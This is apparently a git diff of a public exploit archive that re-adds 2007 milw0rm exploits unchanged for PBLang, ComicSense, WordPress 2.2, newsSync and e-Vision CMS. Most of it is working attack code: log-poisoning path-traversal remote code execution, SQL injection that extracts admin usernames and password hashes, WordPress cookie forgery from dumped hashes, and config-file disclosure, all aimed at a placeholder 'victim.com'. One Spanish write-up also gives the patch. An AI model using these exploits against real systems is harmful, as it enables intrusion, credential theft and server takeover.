-"/../../../../../../usr/local/apache/logs/error_log",
-"/../../../../../../usr/local/apache/logs/error.log",
-"/../../../../../../../usr/local/apache/logs/error_log",
-"/../../../../../../../usr/local/apache/logs/error.log",
-"/../../../../../var/log/apache/access_log",
-"/../../../../../var/log/apache/access.log",
-"/../../../../../../var/log/apache/access_log",
-"/../../../../../../var/log/apache/access.log",
-"/../../../../../../../var/log/apache/access_log",
-"/../../../../../../../var/log/apache/access.log",
-"/../../../../../../var/log/apache/error_log",
-"/../../../../../../var/log/apache/error.log",
-"/../../../../../../../var/log/apache/error_log",
-"/../../../../../../../var/log/apache/error.log",
-"/../../../../../../../../var/log/apache/error_log",
-"/../../../../../../../../var/log/apache/error.log",
-"/../../../../../var/log/access_log",
-"/../../../../../var/log/access.log",
-"/../../../../../../var/log/access_log",
-"/../../../../../../var/log/access.log",
-"/../../../../../../../var/log/access_log",
-"/../../../../../../../var/log/access.log",
-"/../../../../../var/log/error_log",
-"/../../../../../var/log/error.log",
-"/../../../../../../var/log/error_log",
-"/../../../../../../var/log/error.log",
-"/../../../../../../../var/log/error_log",
-"/../../../../../../../var/log/error.log",
-"/../../../../../var/www/logs/access_log",
-"/../../../../../var/www/logs/access.log",
-"/../../../../../../var/www/logs/access_log",
-"/../../../../../../var/www/logs/access.log",
-"/../../../../../../../var/www/logs/access_log",
-"/../../../../../../../var/www/logs/access.log",
-"/../../../../../var/www/logs/error_log",
-"/../../../../../var/www/logs/error.log",
-"/../../../../../../var/www/logs/error_log",
-"/../../../../../../var/www/logs/error.log",
-"/../../../../../../../var/www/logs/error_log",
-"/../../../../../../../var/www/logs/error.log",
-);
-
-for ($i=0; $i<=count($paths)-1; $i++)
-{
-$a=$i+2;
-
-$packet ="GET " . $p . "login.php?lang=" . $paths[$i] . "%00&cmd=" . $cmd . " HTTP/1.1\r\n";
-$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
-$packet.="Host: " . $host . "\r\n";
-$packet.="Connection: Close\r\n\r\n";
-
-sendpacketii($packet);
-
-if (strstr($html,"w4ckw4ck"))
- {
- $temp=explode("w4ckw4ck",$html);
- print "-------------------------------------------------------------------------\r\n";
- print " PBLang <= 4.67.16.a Remote Code Execution Exploit\r\n";
- print "-------------------------------------------------------------------------\r\n";
- echo $temp[1];
- print "-------------------------------------------------------------------------\r\n";
- print " http://www.w4ck1ng.com\r\n";
- print " ...Silentz\r\n";
- print "-------------------------------------------------------------------------\r\n";
- exit;
- }
-}
-
- print "-------------------------------------------------------------------------\r\n";
- print " PBLang <= 4.67.16.a Remote Code Execution Exploit\r\n";
- print "-------------------------------------------------------------------------\r\n";
- echo "[-] Exploit Failed...\r\n";
- print "-------------------------------------------------------------------------\r\n";
- print " http://www.w4ck1ng.com\r\n";
- print " ...Silentz\r\n";
- print "-------------------------------------------------------------------------\r\n";
-
-?>
-
-# milw0rm.com [2007-06-06]
+#!/usr/bin/php -q -d short_open_tag=on
+"-p") and ($temp<>"-P"))
+{$cmd.=" ".$argv[$i];}
+if ($temp=="-p")
+{
+ $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+ $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+$cmd=urlencode($cmd);
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+
+$code="";
+$packet="GET " . $p . $code . " HTTP/1.0\r\n";
+$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
+$packet.="Host: " . $host . "\r\n";
+$packet.="Connection: close\r\n\r\n";
+
+sendpacketii($packet);
+sleep(3);
+
+$paths= array (
+"/../../../../../var/log/httpd/access_log",
+"/../../../../../var/log/httpd/error_log",
+"/../../../../../../var/log/httpd/access_log",
+"/../../../../../../var/log/httpd/error_log",
+"/../../../../../../../var/log/httpd/access_log",
+"/../../../../../../../var/log/httpd/error_log",
+"/../../../../../apache/logs/error.log",
+"/../../../../../apache/logs/access.log",
+"/../../../../../../apache/logs/error.log",
+"/../../../../../../apache/logs/access.log",
+"/../../../../../../../apache/logs/error.log",
+"/../../../../../../../apache/logs/access.log",
+"/../../../../../logs/error.log",
+"/../../../../../logs/access.log",
+"/../../../../../../logs/error.log",
+"/../../../../../../logs/access.log",
+"/../../../../../../../logs/error.log",
+"/../../../../../../../logs/access.log",
+"/../../../../../etc/httpd/logs/access_log",
+"/../../../../../etc/httpd/logs/access.log",
+"/../../../../../etc/httpd/logs/error_log",
+"/../../../../../etc/httpd/logs/error.log",
+"/../../../../../../etc/httpd/logs/access_log",
+"/../../../../../../etc/httpd/logs/access.log",
+"/../../../../../../etc/httpd/logs/error_log",
+"/../../../../../../etc/httpd/logs/error.log",
+"/../../../../../../../etc/httpd/logs/access_log",
+"/../../../../../../../etc/httpd/logs/access.log",
+"/../../../../../../../etc/httpd/logs/error_log",
+"/../../../../../../../etc/httpd/logs/error.log",
+"/../../../../../usr/local/apache/logs/access_log",
+"/../../../../../usr/local/apache/logs/access.log",
+"/../../../../../../usr/local/apache/logs/access_log",
+"/../../../../../../usr/local/apache/logs/access.log",
+"/../../../../../../../usr/local/apache/logs/access_log",
+"/../../../../../../../usr/local/apache/logs/access.log",
+"/../../../../../usr/local/apache/logs/error_log",
+"/../../../../../usr/local/apache/logs/error.log",
+"/../../../../../../usr/local/apache/logs/error_log",
+"/../../../../../../usr/local/apache/logs/error.log",
+"/../../../../../../../usr/local/apache/logs/error_log",
+"/../../../../../../../usr/local/apache/logs/error.log",
+"/../../../../../var/log/apache/access_log",
+"/../../../../../var/log/apache/access.log",
+"/../../../../../../var/log/apache/access_log",
+"/../../../../../../var/log/apache/access.log",
+"/../../../../../../../var/log/apache/access_log",
+"/../../../../../../../var/log/apache/access.log",
+"/../../../../../../var/log/apache/error_log",
+"/../../../../../../var/log/apache/error.log",
+"/../../../../../../../var/log/apache/error_log",
+"/../../../../../../../var/log/apache/error.log",
+"/../../../../../../../../var/log/apache/error_log",
+"/../../../../../../../../var/log/apache/error.log",
+"/../../../../../var/log/access_log",
+"/../../../../../var/log/access.log",
+"/../../../../../../var/log/access_log",
+"/../../../../../../var/log/access.log",
+"/../../../../../../../var/log/access_log",
+"/../../../../../../../var/log/access.log",
+"/../../../../../var/log/error_log",
+"/../../../../../var/log/error.log",
+"/../../../../../../var/log/error_log",
+"/../../../../../../var/log/error.log",
+"/../../../../../../../var/log/error_log",
+"/../../../../../../../var/log/error.log",
+"/../../../../../var/www/logs/access_log",
+"/../../../../../var/www/logs/access.log",
+"/../../../../../../var/www/logs/access_log",
+"/../../../../../../var/www/logs/access.log",
+"/../../../../../../../var/www/logs/access_log",
+"/../../../../../../../var/www/logs/access.log",
+"/../../../../../var/www/logs/error_log",
+"/../../../../../var/www/logs/error.log",
+"/../../../../../../var/www/logs/error_log",
+"/../../../../../../var/www/logs/error.log",
+"/../../../../../../../var/www/logs/error_log",
+"/../../../../../../../var/www/logs/error.log",
+);
+
+for ($i=0; $i<=count($paths)-1; $i++)
+{
+$a=$i+2;
+
+$packet ="GET " . $p . "login.php?lang=" . $paths[$i] . "%00&cmd=" . $cmd . " HTTP/1.1\r\n";
+$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
+$packet.="Host: " . $host . "\r\n";
+$packet.="Connection: Close\r\n\r\n";
+
+sendpacketii($packet);
+
+if (strstr($html,"w4ckw4ck"))
+ {
+ $temp=explode("w4ckw4ck",$html);
+ print "-------------------------------------------------------------------------\r\n";
+ print " PBLang <= 4.67.16.a Remote Code Execution Exploit\r\n";
+ print "-------------------------------------------------------------------------\r\n";
+ echo $temp[1];
+ print "-------------------------------------------------------------------------\r\n";
+ print " http://www.w4ck1ng.com\r\n";
+ print " ...Silentz\r\n";
+ print "-------------------------------------------------------------------------\r\n";
+ exit;
+ }
+}
+
+ print "-------------------------------------------------------------------------\r\n";
+ print " PBLang <= 4.67.16.a Remote Code Execution Exploit\r\n";
+ print "-------------------------------------------------------------------------\r\n";
+ echo "[-] Exploit Failed...\r\n";
+ print "-------------------------------------------------------------------------\r\n";
+ print " http://www.w4ck1ng.com\r\n";
+ print " ...Silentz\r\n";
+ print "-------------------------------------------------------------------------\r\n";
+
+?>
+
+# milw0rm.com [2007-06-06]
diff --git a/platforms/php/webapps/4037.pl b/platforms/php/webapps/4037.pl
index 5653c09c2..c9bd1bb9c 100755
--- a/platforms/php/webapps/4037.pl
+++ b/platforms/php/webapps/4037.pl
@@ -1,69 +1,69 @@
-#!/usr/bin/perl -w
-
-#################################################################################
-# #
-# ComicSense 0.2 SQL Injection Exploit #
-# #
-# Discovered by: s0cratex #
-# Payload: Admin Username & Hash Retrieval #
-# Website: http://www.w4ck1ng.com #
-# #
-# Original Advisory: http://seclists.org/bugtraq/2007/Jun/0063.html #
-# http://milw0rm.com/exploits/4035 #
-# #
-# Vulnerable Code (index.php): #
-# #
-# $sqlQuery = "SELECT * FROM " . $prefix . "comic WHERE episodenr = $epi"; #
-# #
-# PoC: http://victim.com/index.php?epi=-999 UNION SELECT username,0,password #
-# FROM users LIMIT 1 #
-# #
-# Subject To: Nothing #
-# GoogleDork: Get your own! #
-# #
-# Shoutz: The entire w4ck1ng community & s0cratex #
-# #
-#################################################################################
-
-use LWP::UserAgent;
-if (@ARGV < 1){
-print "-------------------------------------------------------------------------\r\n";
-print " ComicSense 0.2 SQL Injection Exploit\r\n";
-print "-------------------------------------------------------------------------\r\n";
-print "Usage: w4ck1ng_comicsense.pl [PATH]\r\n\r\n";
-print "[PATH] = Path where ComicSense is located\r\n\r\n";
-print "e.g. w4ck1ng_comicsense.pl http://victim.com/comic/\r\n";
-print "-------------------------------------------------------------------------\r\n";
-print " http://www.w4ck1ng.com\r\n";
-print " ...Silentz\r\n";
-print "-------------------------------------------------------------------------\r\n";
-exit();
-}
-
-$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
-$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
-
-$host = $ARGV[0] . "index.php?epi=-999 UNION SELECT username,0,password FROM users LIMIT 1";
-
-$res = $b->request(HTTP::Request->new(GET=>$host));
-$res->content =~ /.jpg" alt="#(.*?):/;
-
- ($user) = $res->content =~ /.jpg" alt="#(.*?):/;
- ($hash) = $res->content =~ /: ([0-9a-fA-F]{32})" \/>/;
-
-if($user && $hash){
-
-print "-------------------------------------------------------------------------\r\n";
-print " ComicSense 0.2 SQL Injection Exploit\r\n";
-print "-------------------------------------------------------------------------\r\n";
-print "[+] Admin User : $user\n";
-print "[+] Admin Hash : $hash\n";
-print "-------------------------------------------------------------------------\r\n";
-print " http://www.w4ck1ng.com\r\n";
-print " ...Silentz\r\n";
-print "-------------------------------------------------------------------------\r\n";
-} else {
- print "\nExploit Failed...\n";
-}
-
-# milw0rm.com [2007-06-06]
+#!/usr/bin/perl -w
+
+#################################################################################
+# #
+# ComicSense 0.2 SQL Injection Exploit #
+# #
+# Discovered by: s0cratex #
+# Payload: Admin Username & Hash Retrieval #
+# Website: http://www.w4ck1ng.com #
+# #
+# Original Advisory: http://seclists.org/bugtraq/2007/Jun/0063.html #
+# http://milw0rm.com/exploits/4035 #
+# #
+# Vulnerable Code (index.php): #
+# #
+# $sqlQuery = "SELECT * FROM " . $prefix . "comic WHERE episodenr = $epi"; #
+# #
+# PoC: http://victim.com/index.php?epi=-999 UNION SELECT username,0,password #
+# FROM users LIMIT 1 #
+# #
+# Subject To: Nothing #
+# GoogleDork: Get your own! #
+# #
+# Shoutz: The entire w4ck1ng community & s0cratex #
+# #
+#################################################################################
+
+use LWP::UserAgent;
+if (@ARGV < 1){
+print "-------------------------------------------------------------------------\r\n";
+print " ComicSense 0.2 SQL Injection Exploit\r\n";
+print "-------------------------------------------------------------------------\r\n";
+print "Usage: w4ck1ng_comicsense.pl [PATH]\r\n\r\n";
+print "[PATH] = Path where ComicSense is located\r\n\r\n";
+print "e.g. w4ck1ng_comicsense.pl http://victim.com/comic/\r\n";
+print "-------------------------------------------------------------------------\r\n";
+print " http://www.w4ck1ng.com\r\n";
+print " ...Silentz\r\n";
+print "-------------------------------------------------------------------------\r\n";
+exit();
+}
+
+$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
+$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
+
+$host = $ARGV[0] . "index.php?epi=-999 UNION SELECT username,0,password FROM users LIMIT 1";
+
+$res = $b->request(HTTP::Request->new(GET=>$host));
+$res->content =~ /.jpg" alt="#(.*?):/;
+
+ ($user) = $res->content =~ /.jpg" alt="#(.*?):/;
+ ($hash) = $res->content =~ /: ([0-9a-fA-F]{32})" \/>/;
+
+if($user && $hash){
+
+print "-------------------------------------------------------------------------\r\n";
+print " ComicSense 0.2 SQL Injection Exploit\r\n";
+print "-------------------------------------------------------------------------\r\n";
+print "[+] Admin User : $user\n";
+print "[+] Admin Hash : $hash\n";
+print "-------------------------------------------------------------------------\r\n";
+print " http://www.w4ck1ng.com\r\n";
+print " ...Silentz\r\n";
+print "-------------------------------------------------------------------------\r\n";
+} else {
+ print "\nExploit Failed...\n";
+}
+
+# milw0rm.com [2007-06-06]
diff --git a/platforms/php/webapps/4039.txt b/platforms/php/webapps/4039.txt
index 547fa1ded..6f79255b5 100755
--- a/platforms/php/webapps/4039.txt
+++ b/platforms/php/webapps/4039.txt
@@ -1,175 +1,175 @@ -/* -El error, bastante tonto por cierto, se encuentra en la función wp_suggestCategories, en el archivo xmlrpc.php: - -function wp_suggestCategories($args) { - global $wpdb; - - $this->escape($args); - - $blog_id = (int) $args[0]; - $username = $args[1]; - $password = $args[2]; - $category = $args[3]; - $max_results = $args[4]; - - if(!$this->login_pass_ok($username, $password)) { - return($this->error); - } - - // Only set a limit if one was provided. - $limit = ""; - if(!empty($max_results)) { - $limit = "LIMIT {$max_results}"; - } - - $category_suggestions = $wpdb->get_results(" - SELECT cat_ID category_id, - cat_name category_name - FROM {$wpdb->categories} - WHERE cat_name LIKE '{$category}%' - {$limit} - "); - - return($category_suggestions); -} - -Como se puede observar en la porción de código, no se hace una conversión a entero del valor de $max_results, por lo que es posible enviar valores del tipo 0 UNION ALL SELECT user_login, user_pass FROM wp_users. Para que un atacante logre su objetivo, es necesario que éste tenga una cuenta de usuario válida (una cuenta de tipo suscriber basta y sobra) en el sitio víctima. - -Preparé un pequeño exploit (Creditos: Alex) que devuelve la lista de usuarios con sus respectivas contraseñas en MD5, además también incluye las cookies de autenticación para cada usuario. 
- -Credits: Alex de la Concha - -code c sharp: -*/ - -using System; -using System.Net; -using System.Text; -using System.Xml; -using System.Text.RegularExpressions; -using System.Security.Cryptography; - -class Program -{ - static void Main(string[] args) - { - string targetUrl = "http://localhost/wp/"; - string login = "alex"; - string password = "1234"; - - string data = @" - wp.suggestCategories - - 1 - {0} - {1} - 1 - 0 UNION ALL SELECT user_login, user_pass FROM {2}users - -"; - - string cookieHash = GetCookieHash(targetUrl); - - using (WebClient request = new WebClient()) - { - /* Probar con el prefijo por omisión */ - string response = request.UploadString(targetUrl + "xmlrpc.php", - string.Format(data, login, password, "wp_svn_")); - - /* Se hace una nueva petición si la consulta anterior falla */ - Match match = Regex.Match(response, @"FROM\s+(.*?)categories\s+"); - if (match.Success) - { - response = request.UploadString(targetUrl + "xmlrpc.php ", - string.Format(data, login, password, match.Groups[1].Value)); - } - - try - { - XmlDocument doc = new XmlDocument(); - doc.LoadXml(response); - - XmlNodeList nodes = doc.SelectNodes("//struct/member/value"); - - if (nodes != null && doc.SelectSingleNode("/methodResponse/fault") == null) - { - string user, pass; - /* Mostrar lista de: - * Usuario md5(contraseña) - * Cookie de Autenticación - * - */ - for (int i = 0; i < nodes.Count / 2 + 1; i += 2) - { - user = nodes.Item(i).InnerText; - pass = nodes.Item(i + 1).InnerText; - Console.WriteLine("Usuario: {0}\tMD5(Contraseña): {1}", - user, - pass); - Console.WriteLine("Cookie: wordpressuser_{0}={1};wordpresspass_{0}={2}\n", - cookieHash, - user, - MD5(pass)); - } - } - else - { - Console.WriteLine("Error:\n{0}", response); - } - } - catch (Exception ex) - { - Console.WriteLine("Error:\n" + ex.ToString()); - } - } - } - - private static string GetCookieHash(string targetUrl) - { - WebRequest request = WebRequest.Create(targetUrl + "wp-login.php?action=logout"); - 
request.Method = "HEAD"; - (request as HttpWebRequest).AllowAutoRedirect = false; - - WebResponse response = request.GetResponse(); - if (response != null) - { - Match match = Regex.Match(response.Headers["Set-Cookie"], - @"wordpress[a-z]+_([a-z\d]{32})", - RegexOptions.IgnoreCase); - - if (match.Success) - return match.Groups[1].Value; - } - return string.Empty; - } - public static string MD5(string password) - { - MD5CryptoServiceProvider x = new MD5CryptoServiceProvider(); - byte[] bs = Encoding.UTF8.GetBytes(password); - bs = x.ComputeHash(bs); - StringBuilder s = new StringBuilder(); - foreach (byte b in bs) - { - s.Append(b.ToString("x2").ToLower()); - } - return s.ToString(); - } -} -/* -Para corregir este problema, mientras liberan actualizaciones para Wordpress 2.2, es editar el archivo xmlrpc.php y cambiar la línea $max_results = $args[4]; de la función wp_suggestCategories por $max_results = (int) $args[4]; o en su defecto bloquear el acceso a xmlrpc.php. - -o malo esque tienes que tener una cuenta aunque sea con los minimos permisos para obtener los demas nombres de users con sus respectivos MD5. - - static void Main(string[] args) - { - string targetUrl = "http://localhost/wp/"; - string login = "alex"; - string password = "1234"; - -hay seria la ruta donde esta colocado el wordpress 2.2, tu nombre de usuario y tu password. -Ya se creo un zip con los archivos vulnerables ya reparados [ xmlrpc.php, wp-admin/post-new.php, wp-admin/page-new.php , wp-admin/users-edit.php. 
] - -:: [Slappter] :: -*/ - -# milw0rm.com [2007-06-06] +/* +El error, bastante tonto por cierto, se encuentra en la función wp_suggestCategories, en el archivo xmlrpc.php: + +function wp_suggestCategories($args) { + global $wpdb; + + $this->escape($args); + + $blog_id = (int) $args[0]; + $username = $args[1]; + $password = $args[2]; + $category = $args[3]; + $max_results = $args[4]; + + if(!$this->login_pass_ok($username, $password)) { + return($this->error); + } + + // Only set a limit if one was provided. + $limit = ""; + if(!empty($max_results)) { + $limit = "LIMIT {$max_results}"; + } + + $category_suggestions = $wpdb->get_results(" + SELECT cat_ID category_id, + cat_name category_name + FROM {$wpdb->categories} + WHERE cat_name LIKE '{$category}%' + {$limit} + "); + + return($category_suggestions); +} + +Como se puede observar en la porción de código, no se hace una conversión a entero del valor de $max_results, por lo que es posible enviar valores del tipo 0 UNION ALL SELECT user_login, user_pass FROM wp_users. Para que un atacante logre su objetivo, es necesario que éste tenga una cuenta de usuario válida (una cuenta de tipo suscriber basta y sobra) en el sitio víctima. + +Preparé un pequeño exploit (Creditos: Alex) que devuelve la lista de usuarios con sus respectivas contraseñas en MD5, además también incluye las cookies de autenticación para cada usuario. 
+ +Credits: Alex de la Concha + +code c sharp: +*/ + +using System; +using System.Net; +using System.Text; +using System.Xml; +using System.Text.RegularExpressions; +using System.Security.Cryptography; + +class Program +{ + static void Main(string[] args) + { + string targetUrl = "http://localhost/wp/"; + string login = "alex"; + string password = "1234"; + + string data = @" + wp.suggestCategories + + 1 + {0} + {1} + 1 + 0 UNION ALL SELECT user_login, user_pass FROM {2}users + +"; + + string cookieHash = GetCookieHash(targetUrl); + + using (WebClient request = new WebClient()) + { + /* Probar con el prefijo por omisión */ + string response = request.UploadString(targetUrl + "xmlrpc.php", + string.Format(data, login, password, "wp_svn_")); + + /* Se hace una nueva petición si la consulta anterior falla */ + Match match = Regex.Match(response, @"FROM\s+(.*?)categories\s+"); + if (match.Success) + { + response = request.UploadString(targetUrl + "xmlrpc.php ", + string.Format(data, login, password, match.Groups[1].Value)); + } + + try + { + XmlDocument doc = new XmlDocument(); + doc.LoadXml(response); + + XmlNodeList nodes = doc.SelectNodes("//struct/member/value"); + + if (nodes != null && doc.SelectSingleNode("/methodResponse/fault") == null) + { + string user, pass; + /* Mostrar lista de: + * Usuario md5(contraseña) + * Cookie de Autenticación + * + */ + for (int i = 0; i < nodes.Count / 2 + 1; i += 2) + { + user = nodes.Item(i).InnerText; + pass = nodes.Item(i + 1).InnerText; + Console.WriteLine("Usuario: {0}\tMD5(Contraseña): {1}", + user, + pass); + Console.WriteLine("Cookie: wordpressuser_{0}={1};wordpresspass_{0}={2}\n", + cookieHash, + user, + MD5(pass)); + } + } + else + { + Console.WriteLine("Error:\n{0}", response); + } + } + catch (Exception ex) + { + Console.WriteLine("Error:\n" + ex.ToString()); + } + } + } + + private static string GetCookieHash(string targetUrl) + { + WebRequest request = WebRequest.Create(targetUrl + "wp-login.php?action=logout"); + 
request.Method = "HEAD"; + (request as HttpWebRequest).AllowAutoRedirect = false; + + WebResponse response = request.GetResponse(); + if (response != null) + { + Match match = Regex.Match(response.Headers["Set-Cookie"], + @"wordpress[a-z]+_([a-z\d]{32})", + RegexOptions.IgnoreCase); + + if (match.Success) + return match.Groups[1].Value; + } + return string.Empty; + } + public static string MD5(string password) + { + MD5CryptoServiceProvider x = new MD5CryptoServiceProvider(); + byte[] bs = Encoding.UTF8.GetBytes(password); + bs = x.ComputeHash(bs); + StringBuilder s = new StringBuilder(); + foreach (byte b in bs) + { + s.Append(b.ToString("x2").ToLower()); + } + return s.ToString(); + } +} +/* +Para corregir este problema, mientras liberan actualizaciones para Wordpress 2.2, es editar el archivo xmlrpc.php y cambiar la línea $max_results = $args[4]; de la función wp_suggestCategories por $max_results = (int) $args[4]; o en su defecto bloquear el acceso a xmlrpc.php. + +o malo esque tienes que tener una cuenta aunque sea con los minimos permisos para obtener los demas nombres de users con sus respectivos MD5. + + static void Main(string[] args) + { + string targetUrl = "http://localhost/wp/"; + string login = "alex"; + string password = "1234"; + +hay seria la ruta donde esta colocado el wordpress 2.2, tu nombre de usuario y tu password. +Ya se creo un zip con los archivos vulnerables ya reparados [ xmlrpc.php, wp-admin/post-new.php, wp-admin/page-new.php , wp-admin/users-edit.php. ] + +:: [Slappter] :: +*/ + +# milw0rm.com [2007-06-06] diff --git a/platforms/php/webapps/4041.htm b/platforms/php/webapps/4041.htm index eef007da6..367f6e8d2 100755 --- a/platforms/php/webapps/4041.htm +++ b/platforms/php/webapps/4041.htm @@ -1,81 +1,81 @@ - - - -newsSync 1.5.0rc6 (nuke_include.php) Remote File Inclusion -Exploit - - - - - - -
    - -

    newsSync 1.5.0rc6 -(nuke_include.php) Remote File Inclusion Exploit

    - -

    -
    - Target:[http://[vicim]/[path] -   -

    -

    -
    -


    - -

    - -Mahmood_ali

    - -TrYaG-Team

    -

    -
    - - - - -# milw0rm.com [2007-06-07] + + + +newsSync 1.5.0rc6 (nuke_include.php) Remote File Inclusion +Exploit + + + + + + +
    + +

    newsSync 1.5.0rc6 +(nuke_include.php) Remote File Inclusion Exploit

    + +

    +
    + Target:[http://[vicim]/[path] +   +

    +

    +
    +


    + +

    + +Mahmood_ali

    + +TrYaG-Team

    +

    +
    + + + + +# milw0rm.com [2007-06-07] diff --git a/platforms/php/webapps/4054.php b/platforms/php/webapps/4054.php index 669262d28..106caae64 100755 --- a/platforms/php/webapps/4054.php +++ b/platforms/php/webapps/4054.php 
@@ -1,299 +1,299 @@ -#!/usr/bin/php -q -d short_open_tag=on - -# -################# - -...need i say more? - - - -Bug #2 (admin/functions.php): - -################# -# -# if ( isset($_COOKIE['adminlang']) ) { $language_selector = $_COOKIE['adminlang']; } -# else { $language_selector = "en"; } -# include("lang/".$language_selector.".php"); -# -################# - -...speaks for it self really. - - - -Bug #3 (); - -################# -# -# $sql = "SELECT `style_css` FROM `templates` WHERE `id`='".$_GET['template']."' AND `show`='Y' AND `trash`='N'"; -# $result = mysql_query($sql) or die(mysql_error()); -# $row = mysql_fetch_array($result); -# $css .= $row['style_css']; -# -################# - -...again appauling! - -*/ - -error_reporting(0); -ini_set("max_execution_time",0); -ini_set("default_socket_timeout",5); - -if ($argc<4) { -print "-------------------------------------------------------------------------\r\n"; -print " e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit\r\n"; -print "-------------------------------------------------------------------------\r\n"; -print "Usage: w4ck1ng_evision.php [OPTION] [HOST] [PATH] ([USER] [PASS] [COMMAND])\r\n\r\n"; -print "[OPTION] = 0 = SQL Injection (Admin user & hash retrieval)\r\n"; -print " 1 = Config File Disclosure (Database user & pass retrieval)\r\n"; -print " 2 = Remote Code Execution\r\n"; -print "[HOST] = Target server's hostname or ip address\r\n"; -print "[PATH] = Path where e-Vision CMS is located\r\n"; -print "[COMMAND] = Command to execute\r\n\r\n"; -print "e.g. 
w4ck1ng_evision.php 0 victim.com /\r\n"; -print " w4ck1ng_evision.php 1 victim.com /\r\n"; -print " w4ck1ng_evision.php 2 victim.com / username password \"ls -lia\"\r\n"; -print "-------------------------------------------------------------------------\r\n"; -print " http://www.w4ck1ng.com\r\n"; -print " ...Silentz\r\n"; -print "-------------------------------------------------------------------------\r\n"; -die; -} - -//Props to rgod for the following functions - -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); -} - -function make_seed() -{ - list($usec, $sec) = explode(' ', microtime()); - return (float) $sec + ((float) $usec * 100000); -} - -$exploit = $argv[1]; -$host = $argv[2]; -$path = $argv[3]; -$cmd = $argv[4]; -$cmd = urlencode($cmd); -$port=80;$proxy=""; - -if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... 
check the path!'; die;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - -function head(){ - - print "-------------------------------------------------------------------------\r\n"; - print " e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit\r\n"; - print "-------------------------------------------------------------------------\r\n"; - - } - -function footer(){ - - print "-------------------------------------------------------------------------\r\n"; - print " http://www.w4ck1ng.com\r\n"; - print " ...Silentz\r\n"; - print "-------------------------------------------------------------------------\r\n"; - } - -if ($exploit==0){ - - head(); - - $sql = "-999' UNION SELECT CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),pass) FROM users WHERE idusers=1 /*"; - $sql = urlencode($sql); - $packet ="GET " . $path . "style.php?template=" . $sql . " HTTP/1.1\r\n"; - $packet.="Host: ".$host."\r\n"; - $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;)\r\n"; - $packet.="Connection: Close\r\n\r\n"; - sendpacketii($packet); - - if (strstr($html,"Username=")) - { - $temp=explode("::Hash=",$html); - $temp2=explode("Username=",$temp[0]); - - echo "[+] Admin User: " . $temp2[1] . "\n"; - - $temp=explode("Username=",$html); - $temp2=explode("::Hash=",$temp[1]); - - echo "[+] Admin Hash: " . $temp2[1] . "\r\n"; - - footer(); - die; - } - -else{die(); exit();}} - -if($exploit==1){ - - $sploit = "admin/show_img.php?img=../vars.php"; - $packet ="GET " . $path . $sploit . " HTTP/1.1\r\n"; - $packet.="Host: " . $host . "\r\n"; - $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;)\r\n"; - $packet.="Connection: Close\r\n\r\n"; - sendpacketii($packet); - - if (strstr($html,""; -$packet="GET " . $p . $code . 
" HTTP/1.0\r\n"; -$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;)\r\n"; -$packet.="Host: " . $host . "\r\n"; -$packet.="Connection: close\r\n\r\n"; - -sendpacketii($packet); - -$paths= array ( -"../../../../../var/log/httpd/access_log", -"../../../../../var/log/httpd/error_log", -"../apache/logs/error.log", -"../apache/logs/access.log", -"../../apache/logs/error.log", -"../../apache/logs/access.log", -"../../../apache/logs/error.log", -"../../../apache/logs/access.log", -"../../../../apache/logs/error.log", -"../../../../apache/logs/access.log", -"../../../../../apache/logs/error.log", -"../../../../../apache/logs/access.log", -"../logs/error.log", -"../logs/access.log", -"../../logs/error.log", -"../../logs/access.log", -"../../../logs/error.log", -"../../../logs/access.log", -"../../../../logs/error.log", -"../../../../logs/access.log", -"../../../../../logs/error.log", -"../../../../../logs/access.log", -"../../../../../etc/httpd/logs/access_log", -"../../../../../etc/httpd/logs/access.log", -"../../../../../etc/httpd/logs/error_log", -"../../../../../etc/httpd/logs/error.log", -"../../../../../var/www/logs/access_log", -"../../../../../var/www/logs/access.log", -"../../../../../usr/local/apache/logs/access_log", -"../../../../../usr/local/apache/logs/access.log", -"../../../../../var/log/apache/access_log", -"../../../../../var/log/apache/access.log", -"../../../../../var/log/access_log", -"../../../../../var/www/logs/error_log", -"../../../../../var/www/logs/error.log", -"../../../../../usr/local/apache/logs/error_log", -"../../../../../usr/local/apache/logs/error.log", 